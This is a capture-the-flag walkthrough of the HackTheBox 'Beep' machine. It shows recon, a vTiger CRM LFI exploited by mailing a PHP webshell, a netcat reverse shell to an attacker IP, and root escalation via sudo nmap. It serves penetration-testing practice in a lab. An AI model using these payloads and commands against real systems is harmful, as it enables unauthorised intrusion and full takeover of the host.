Beep
An easy Linux box from HackTheBox, get initial access by a webshell uploaded as mail, and run by LFI, then get root by abusing sudo privileges on nmap.
Recon
Running the usual nmap
sudo nmap -sC -sV -oA nmap/init 10.10.10.7
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey:
| 1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA)
|_ 2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA)
25/tcp open smtp Postfix smtpd
|_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN
80/tcp open http Apache httpd 2.2.3
|_http-server-header: Apache/2.2.3 (CentOS)
|_http-title: Did not follow redirect to https://10.10.10.7/
110/tcp open pop3 Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
|_sslv2: ERROR: Script execution failed (use -d to debug)
|_pop3-capabilities: EXPIRE(NEVER) RESP-CODES IMPLEMENTATION(Cyrus POP3 server v2) AUTH-RESP-CODE TOP STLS PIPELINING USER UIDL APOP LOGIN-DELAY(0)
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100024 1 875/udp status
|_ 100024 1 878/tcp status
143/tcp open imap Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
|_sslv2: ERROR: Script execution failed (use -d to debug)
|_imap-capabilities: NAMESPACE MULTIAPPEND OK Completed NO THREAD=REFERENCES X-NETSCAPE LITERAL+ THREAD=ORDEREDSUBJECT BINARY IMAP4rev1 ATOMIC QUOTA LIST-SUBSCRIBED LISTEXT ID CHILDREN IDLE RENAME CONDSTORE CATENATE ANNOTATEMORE STARTTLS UIDPLUS URLAUTHA0001 RIGHTS=kxte SORT=MODSEQ SORT MAILBOX-REFERRALS IMAP4 UNSELECT ACL
|_imap-ntlm-info: ERROR: Script execution failed (use -d to debug)
443/tcp open ssl/http Apache httpd 2.2.3 ((CentOS))
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2017-04-07T08:22:08
|_Not valid after: 2018-04-07T08:22:08
|_ssl-date: 2022-09-20T18:47:29+00:00; +1s from scanner time.
|_http-server-header: Apache/2.2.3 (CentOS)
| http-robots.txt: 1 disallowed entry
|_/
|_http-title: Elastix - Login page
993/tcp open ssl/imap Cyrus imapd
|_imap-capabilities: CAPABILITY
995/tcp open pop3 Cyrus pop3d
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_ssl-known-key: ERROR: Script execution failed (use -d to debug)
|_sslv2: ERROR: Script execution failed (use -d to debug)
3306/tcp open mysql MySQL (unauthorized)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
|_sslv2: ERROR: Script execution failed (use -d to debug)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
4445/tcp open upnotifyp?
10000/tcp open http MiniServ 1.570 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: Hosts: beep.localdomain, 127.0.0.1, example.com
Do a searchsploit for the enumerated versions, but no easy wins come up
Next up, run a gobuster
gobuster dir -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -t 40 --url https://10.10.10.7 -x php -k
And find a large list of directories, however when trying to navigate to them, most are locked behind an Elastix login page
/images (Status: 301) [Size: 310] [--> https://10.10.10.7/images/]
/admin (Status: 301) [Size: 309] [--> https://10.10.10.7/admin/]
/modules (Status: 301) [Size: 311] [--> https://10.10.10.7/modules/]
/themes (Status: 301) [Size: 310] [--> https://10.10.10.7/themes/]
/register.php (Status: 200) [Size: 1785]
/help (Status: 301) [Size: 308] [--> https://10.10.10.7/help/]
/config.php (Status: 200) [Size: 1785]
/var (Status: 301) [Size: 307] [--> https://10.10.10.7/var/]
/mail (Status: 301) [Size: 308] [--> https://10.10.10.7/mail/]
/static (Status: 301) [Size: 310] [--> https://10.10.10.7/static/]
/lang (Status: 301) [Size: 308] [--> https://10.10.10.7/lang/]
/libs (Status: 301) [Size: 308] [--> https://10.10.10.7/libs/]
/index.php (Status: 200) [Size: 1785]
/panel (Status: 301) [Size: 309] [--> https://10.10.10.7/panel/]
/configs (Status: 301) [Size: 311] [--> https://10.10.10.7/configs/]
/recordings (Status: 301) [Size: 314] [--> https://10.10.10.7/recordings/]
/vtigercrm (Status: 301) [Size: 313] [--> https://10.10.10.7/vtigercrm/]
However, when navigating to /vtigercrm/ , find a vtigercrm 5.1.0 version - which is vulnerable to LFI
searchsploit vtiger
vTiger CRM 5.1.0 - Local File Inclusion | php/webapps/18770.txt
Then looking at the POC, its an LFI in the URL
https://localhost/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/passwd%00
Exploitation
To exploit this, need to get some kind of file on the server to create a webshell
I tried for a while for log poisoning, but it never worked
Instead, I opted to get a webshell by sending a webshell via email
To enumerate users, I leaked the POC /etc/passwd file
And find a user named “asterisk”
To check if they exist on the mail server, connect to port 25 on the server via netcat and ask for the server to verify if the user exists
kali> nc 10.10.10.7 25
VRFY asterisk
220 beep.localdomain ESMTP Postfix
252 2.0.0 asterisk
Seeing as they do, can proceed to send a simple php webshell using swaks
swaks --to asterisk@localhost --from gg@htb.com --header "Subject: webshell" --body 'codexec: <?php system($_REQUEST["cmd"]); ?>' --server 10.10.10.7
=== Trying 10.10.10.7:25...
=== Connected to 10.10.10.7.
<- 220 beep.localdomain ESMTP Postfix
-> EHLO kali
<- 250-beep.localdomain
<- 250-PIPELINING
<- 250-SIZE 10240000
<- 250-VRFY
<- 250-ETRN
<- 250-ENHANCEDSTATUSCODES
<- 250-8BITMIME
<- 250 DSN
-> MAIL FROM:<gg@htb.com>
<- 250 2.1.0 Ok
-> RCPT TO:<asterisk@localhost>
<- 250 2.1.5 Ok
-> DATA
<- 354 End data with <CR><LF>.<CR><LF>
-> Date: Tue, 20 Sep 2022 18:39:35 -0400
-> To: asterisk@localhost
-> From: gg@htb.com
-> Subject: webshell
-> Message-Id: <20220920183935.063066@kali>
-> X-Mailer: swaks v20201014.0 jetmore.org/john/code/swaks/
->
-> codexec: <?php system($_REQUEST["cmd"]); ?>
->
->
-> .
<- 250 2.0.0 Ok: queued as C6C92D92FD
-> QUIT
<- 221 2.0.0 Bye
=== Connection closed with remote host
Now in the browser, navigate to the location of the mail to see if it worked
https://10.10.10.7/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../../../../../var/mail/asterisk%00&cmd=id
And it does! We have code exec
Now upgrading to a reverse shell by URL encoding a netcat reverse shell
kali> urlencode "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc KALI_IP 4444 >/tmp/f"
rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%2010.10.14.5%204444%20%3E%2Ftmp%2Ff
Then starting a listener on 4444, and after sending the encoded command, catch the shell
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.7] 58425
sh: no job control in this shell
sh-3.2$ whoami
asterisk
sh-3.2$
Quickly upgrading to a fully interactive tty
sh-3.2$ python -c 'import pty;pty.spawn("/bin/bash")'
bash-3.2$ export TERM=xterm
CTRL+Z
kali> stty raw -echo; fg
And now have a fully interactive terminal as the asterisk user
Running “sudo -l”
sudo -l
Matching Defaults entries for asterisk on this host:
env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR
LS_COLORS MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE LC_COLLATE
LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES LC_MONETARY LC_NAME LC_NUMERIC
LC_PAPER LC_TELEPHONE LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET
XAUTHORITY"
User asterisk may run the following commands on this host:
(root) NOPASSWD: /sbin/shutdown
(root) NOPASSWD: /usr/bin/nmap
(root) NOPASSWD: /usr/bin/yum
(root) NOPASSWD: /bin/touch
(root) NOPASSWD: /bin/chmod
(root) NOPASSWD: /bin/chown
(root) NOPASSWD: /sbin/service
(root) NOPASSWD: /sbin/init
(root) NOPASSWD: /usr/sbin/postmap
(root) NOPASSWD: /usr/sbin/postfix
(root) NOPASSWD: /usr/sbin/saslpasswd2
(root) NOPASSWD: /usr/sbin/hardware_detector
(root) NOPASSWD: /sbin/chkconfig
(root) NOPASSWD: /usr/sbin/elastix-helper
See that we can run nmap with sudo without a password, so can quickly escalate to root with
sudo nmap --interactive
Starting Nmap V. 4.11 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
whoami
root
Now have a root shell and can read the root.txt file